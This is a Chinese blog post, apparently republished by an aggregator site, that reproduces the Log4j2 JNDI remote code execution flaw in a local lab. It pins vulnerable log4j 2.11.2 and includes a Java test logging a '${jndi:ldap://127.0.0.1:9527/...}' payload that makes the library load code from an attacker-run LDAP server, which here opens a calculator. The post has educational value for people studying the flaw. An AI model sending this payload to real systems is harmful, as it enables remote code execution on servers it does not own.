我是靠谱客的博主 自觉黑米,最近开发中收集的这篇文章主要介绍log4j2远程代码执行漏洞复现,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

从漏洞曝出,因为从来就没有了解过jndi,所以花了有一天时间才搞出。
以下是简单教程。

1.pom.xml

</dependency>
    <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.11.2</version>
        </dependency>

        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.11.2</version>
        </dependency>
  </dependencies>

2.log4j2.xml

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
    <Appenders>
        <Console name="Console" target="SYSTEM_OUT">
            <PatternLayout pattern="%d{YYYY-MM-dd HH:mm:ss} [%t] %-5p %c{1}:%L - %msg%n" />
        </Console>
    </Appenders>
    <Loggers>
        <Root level="info">
            <AppenderRef ref="Console" />
        </Root>
    </Loggers>
</Configuration>

3.在127.0.0.1:9527先架设个恶意服务,该服务里面的代码是弹出计算器。

4.做个测试

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LogTest {
	public static Logger log = LogManager.getLogger(LogTest.class);
	
	public static void main(String[] args) {
		log.info("${jndi:ldap://127.0.0.1:9527/Muma}");
	}
}

5.看下效果

在这里插入图片描述

6.最为关键的,怎么架设?

看我另外一篇博客:
JNDI注入demo使用ldap方式

7.其他

  • 注意log4j2漏洞不止ldap,对于rmi同样有效
  • 漏洞比较猛

参考

  • JNDI学习总结(一):JNDI到底是什么?
  • 浅谈JNDI
  • 初识JNDI
  • [web安全]Apache Log4j2远程代码执行漏洞
  • LDAP入门
  • 服务器搭建八——LDAP目录服务器
  • 如何安装配置Active Directory
  • LDAP基础:AD:运行在容器中的Active Directory服务
  • 漏洞复现丨快速开启RMI&&LDAP
  • Apache Log4j2远程代码执行漏洞复现

最后

以上就是自觉黑米为你收集整理的log4j2远程代码执行漏洞复现的全部内容,希望文章能够帮你解决log4j2远程代码执行漏洞复现所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(40)

评论列表共有 0 条评论

立即
投稿
返回
顶部